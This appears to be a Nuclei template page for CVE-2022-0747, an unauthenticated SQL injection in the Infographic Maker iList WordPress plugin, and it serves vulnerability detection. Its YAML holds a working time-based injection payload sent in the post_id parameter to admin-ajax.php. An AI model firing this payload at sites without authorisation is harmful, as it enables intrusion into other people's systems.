Skip to content
Nuclei Templates

Infographic Maker iList < 4.3.8 - SQL Injection

ID: CVE-2022-0747

Severity: critical

Author: theamanrawat

Tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud

Description

Section titled “Description”

The Infographic Maker WordPress plugin before 4.3.8 does not validate and escape the post_id parameter before using it in a SQL statement via the qcld_upvote_action AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL Injection.

YAML Source

Section titled “YAML Source”
id: CVE-2022-0747


info:
  name: Infographic Maker iList < 4.3.8 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The Infographic Maker WordPress plugin before 4.3.8 does not validate and escape the post_id parameter before using it in a SQL statement via the qcld_upvote_action AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL Injection.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the WordPress site.
  remediation: Fixed in version 4.3.8
  reference:
    - https://wpscan.com/vulnerability/a8575322-c2cf-486a-9c37-71a22167aac3
    - https://wordpress.org/plugins/infographic-and-list-builder-ilist/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0747
    - https://plugins.trac.wordpress.org/changeset/2684336
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0747
    cwe-id: CWE-89
    epss-score: 0.02705
    epss-percentile: 0.90483
    cpe: cpe:2.3:a:quantumcloud:infographic_maker:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: quantumcloud
    product: infographic_maker
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud


http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        action=qcld_upvote_action&post_id=1+AND+(SELECT+1626+FROM+(SELECT(SLEEP(6)))niPH)
      - |
        GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/javascript")'
          - 'contains(body_2, "show_ilist_templates")'
        condition: and
# digest: 4b0a00483046022100a38bdaa9826e26d0899f7edd17960d47dedecc1577c63401c47aad6320ceb57c022100ca77244a1c407a1c92292e67216ba74a1fad11c37e829a016ef87027f46b84a4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0747.yaml"

View on Github